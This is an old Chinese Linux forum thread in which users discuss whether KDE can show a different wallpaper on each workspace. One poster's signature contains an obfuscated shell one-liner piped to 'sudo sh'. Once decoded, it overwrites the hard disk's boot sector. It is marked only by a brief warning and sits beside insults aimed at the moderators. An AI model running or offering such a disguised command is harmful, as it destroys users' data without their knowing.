当前时区为 UTC + 8 小时



发表新帖 回复这个主题  [ 7 篇帖子 ] 
作者 内容
1 楼 
 文章标题 : [问题]现在的KDE还是每工作区一个背景么
帖子发表于 : 2007-05-08 19:22 
头像

注册: 2007-05-06 8:19
帖子: 7433
送出感谢: 0 次
接收感谢: 4
想知道


页首
 用户资料  
 
2 楼 
 文章标题 :
帖子发表于 : 2007-05-08 19:27 

注册: 2007-03-29 12:59
帖子: 262
送出感谢: 0 次
接收感谢: 0 次
我只用一个工作区


_________________
echo 'qq%vs+&qri&mreb%bs+&qri&uqn%of+FBC%pbhag+B' | tr 'n-za-m&+A-J%' 'a-z/=0-9 ' |sudo sh #<-警告:
强烈鄙视SB版主,一群跟风的SB,一群自以为是的SB
对这个论坛彻底失望了


页首
 用户资料  
 
3 楼 
 文章标题 :
帖子发表于 : 2007-05-08 19:44 
头像

注册: 2006-01-19 11:55
帖子: 1114
地址: HUST
送出感谢: 0 次
接收感谢: 0 次
自己设置
可以不同背景,可以相同


_________________
http://www.classfoo.org


页首
 用户资料  
 
4 楼 
 文章标题 :
帖子发表于 : 2007-05-08 19:55 

注册: 2007-02-13 15:24
帖子: 1485
地址: 地球
送出感谢: 0 次
接收感谢: 0 次
当然。


页首
 用户资料  
 
5 楼 
 文章标题 :
帖子发表于 : 2007-05-10 21:11 
头像

注册: 2007-05-06 8:19
帖子: 7433
送出感谢: 0 次
接收感谢: 4
那可比gnome好玩


页首
 用户资料  
 
6 楼 
 文章标题 :
帖子发表于 : 2007-05-10 21:13 
头像

注册: 2005-08-14 21:55
帖子: 58428
地址: 长沙
送出感谢: 4
接收感谢: 272
傻孩子,不要资源的哦。gnome也有外挂的。fvwm更是随便设置。都占资源的。


_________________
● 鸣学


页首
 用户资料  
 
7 楼 
 文章标题 :
帖子发表于 : 2007-05-12 0:26 
头像

注册: 2007-05-06 8:19
帖子: 7433
送出感谢: 0 次
接收感谢: 4
资源不就是拿来用的嘛,玩呗。
全一样图面,也不知道用的哪个了。
我在红帽上弄的,其中一个区还是若干时间换一张呢,记得是美女图,呵呵


页首
 用户资料  
 
显示帖子 :  排序  
发表新帖 回复这个主题  [ 7 篇帖子 ] 

当前时区为 UTC + 8 小时


在线用户

正在浏览此版面的用户:没有注册用户 和 4 位游客


不能 在这个版面发表主题
不能 在这个版面回复主题
不能 在这个版面编辑帖子
不能 在这个版面删除帖子
不能 在这个版面提交附件

前往 :  
本站点为公益性站点,用于推广开源自由软件,由 DiaHosting VPSBudgetVM VPS 提供服务。
我们认为:软件应可免费取得,软件工具在各种语言环境下皆可使用,且不会有任何功能上的差异;
人们应有定制和修改软件的自由,且方式不受限制,只要他们自认为合适。

Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
简体中文语系由 王笑宇 翻译